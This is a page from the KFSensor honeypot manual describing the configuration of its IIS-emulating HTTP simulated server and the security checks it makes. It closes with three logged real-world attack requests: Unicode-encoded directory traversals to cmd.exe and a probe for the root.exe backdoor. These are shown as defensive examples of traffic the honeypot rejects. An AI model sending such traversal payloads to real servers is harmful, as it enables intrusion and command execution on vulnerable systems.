KFSensor

 

Edit Sim Std Server - HTTP

Use the Edit Sim Std Server - HTTP dialog box to add or edit a HTTP definition.

You will find a description of what are Sim Std Servers here.

An HTTP server is another name for a web server.

Emulation Features

The HTTP Sim Server is the most complex and fully featured of all the sim servers. It is a fully working web server that correctly emulates Microsoft's IIS web server.

Great effort has been made to return the exact response messages that IIS returns in all circumstances, to provide the best possible emulation and reduce the chance of the visitor detecting that they are not visiting a real web server.

This sim server can be used to host a web site. A basic set of files is included with KFSensor that make the server appear to be a default Microsoft IIS configuration. You can replace these files with you own HTML and image files to make the honeypot more realistic.

Microsoft IIS can be configured in many different ways.
KFSensor emulates the following restrictive IIS configuration:

IIS Setting Notes
Disable HTTP Keep-Alives Limits visitor to one request per connection
No Execute permission Scripts and CGI cannot be executed
No ISAPI filters These are extensions to IIS which have often been prone to vulnerabilities in the past
No directory browsing The server will not produce an index page if a directory is requested. Index files are supported
No write permission Visitors are not allowed to change the website contents
Default Error messages IIS can return a custom error page for each type of error.
Only default errors are emulated


Here are some of the features KFSensor implements to provide an accurate emulation of IIS:

Emulated Feature Notes
Error messages ISS returns different error descriptions depending on the error, even for the same response code
Response headers Correct values are returned for the headers contained in the server's response. As well as the common ones, like "Content-Length" the more complex ones are also supported; such as:
"Content-Location", "Last-Modified", "Content-Range" and "ETag"
Header Order Each web server is free to return the response headers in any order.
IIS is inconsistent in the way that it orders these headers. For example sometimes it returns "Content-Length" as the first header and sometimes as the last header. KFSensor matches these different header orders
If-Modified KFSensor supports browser side caching
Range Requests By using the Range header a visitor can request specified parts of a file
HTTP Verbs OPTIONS, TRACE, GET, HEAD, POST all handled correctly
Fragmentation A request can be split into many packets as a way of avoiding detection by signature based IDS.
KFSensor correctly handles fragmentation


The following are some of the checks and restrictions that KFSensor implements to provide a secure emulation of IIS:

Feature Notes
Restricted Extensions Only files with certain common extensions will be returned.
For example .xls, .doc and .exe will never be returned even if they are in the web document directory.
No CGI KFSensor does run attempt to run an external executable or DLL
Buffer over-flows Dynamic buffers are used through to prevent buffer overflows and many additional checks are made.
Unicode attacks CodeRed style double-encoding are checked for
Directory walking Tricks like /../ and /.../ are checked for

HTTP Proxy Server

This sim server also supports HTTP proxy server requests; CONNECT and proxy URLs.

Incorrectly configured HTTP proxy servers are used by people to surf anonymously and to access other non-HTTP services.

For more information on this aspect of the server and how to configure it see the KFSensor Proxy Server emulation section in the KFSensor Administration Guide.

Configuration

Title

  • Name
    Each Sim Std Server requires a unique name, which is used to identify it.
  • Description
    A piece of text for notes on what the Sim Std Server aims to support
  • Default Port
    Most services have standard ports on which visitors expect to find them.
    The default port for HTTP is 80.
    This is only used as a prompt during configuration of a Listen; a Sim Std Server can be set on any or many different ports.
  • Severity
    The severity level that events generated by this Sim Std Server will be given. This can be changed or over ridden as part of the Listen configuration.

Options

These settings control how this Sim Std Server responds to a visitor.
  • Emulation
    The real server that is emulated.
    Nb. At present only the Microsoft IIS server is emulated.
  • Version
    A web server returns a header called "Server", as part of its response, that identifies the make and version number of the http server.
    Setting this value allows you to control the value that is returned to the visitor in this header.
  • Document Root
    This is the path on the local machine of the web server's root directory.
    Files in this directory and any sub directories will be available for visitors to download.
    If this value is blank then the downloading of files will be disabled.
    Take care when changing this setting as it could expose private files on your system to a visitor if not properly configured.
    The path can be either relative or absolute. A relative path is considered to be relative to the KFSensor's installation directory. e.g. "files\iis\wwwroot" will be considered "C:\Program Files\KeyFocus\KFSensor\files\iis\wwwroot".
  • Index Files
    If a visitor requests a directory instead of a file then the server will attempt to locate a suitable index file to be automatically returned instead of a not found error. This value contains a list of files that should be selected as an index files. Each file name should be separated by a single space.
  • Require Basic Authorization
    If this option is checked then the visitor will receive an Unauthorized response. If they are using a browser they will be prompted for a user name and password. All attempts to log on will be rejected and the sim server will not allow any files to be returned to the user.
  • Time out
    The time in seconds that the KFSensor server allows the session to continue for before closing the connection.
  • Idle Time out
    The time in seconds that the KFSensor server will wait for traffic on a connection before closing the connection.
  • Receive limit
    The maximum number of bytes that will be accepted from the visitor before the connection is closed.
  • Log response lines
    If set to a value greater than zero then a response will be truncated to the specified number of lines when it is recorded in the log.
  • Log response size
    If set to a value greater than zero then a response will be truncated to the specified number of bytes when it is recorded in the log.
  • Log receive size
    If set to a value greater than zero then received data will be truncated to the specified number of bytes when it is recorded in the log.

HTTPS Secure Connection Options

The HTTP simulated server supports HTTPS as well as HTTP. This allows visitors to interact with port TCP 443 using encrypted TLS traffic as they would expect on that port.

KFSensor will dynamically generate a self signed certificate for use by the HTTPS simulated service. It is also possible for the simulated server to use a real certificate that has been added to the local Windows certificate store.

Proxy emulation

See the KFSensor Proxy Server emulation section in the KFSensor Administration Guide for more details.
  • HTTP proxy
  • CONNECT proxy

Buttons

Example Attacks

The following are real life examples of attacks on a HTTP Sim Std Server.

GET /_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Sat, 10 May 2003 12:00:02 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the path specified.
</body></html>


GET /scripts/root.exe?/c+dir+c:\ HTTP/1.0
Host: www
HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Sat, 10 May 2003 12:05:01 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the path specified.
</body></html>


GET /_vti_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Sat, 10 May 2003 12:05:00 GMT
Connection: close
Content-Length: 34

<h1>Bad Request (Invalid URL)</h1>

Related Topics


KFSensor On-Line Manual Contents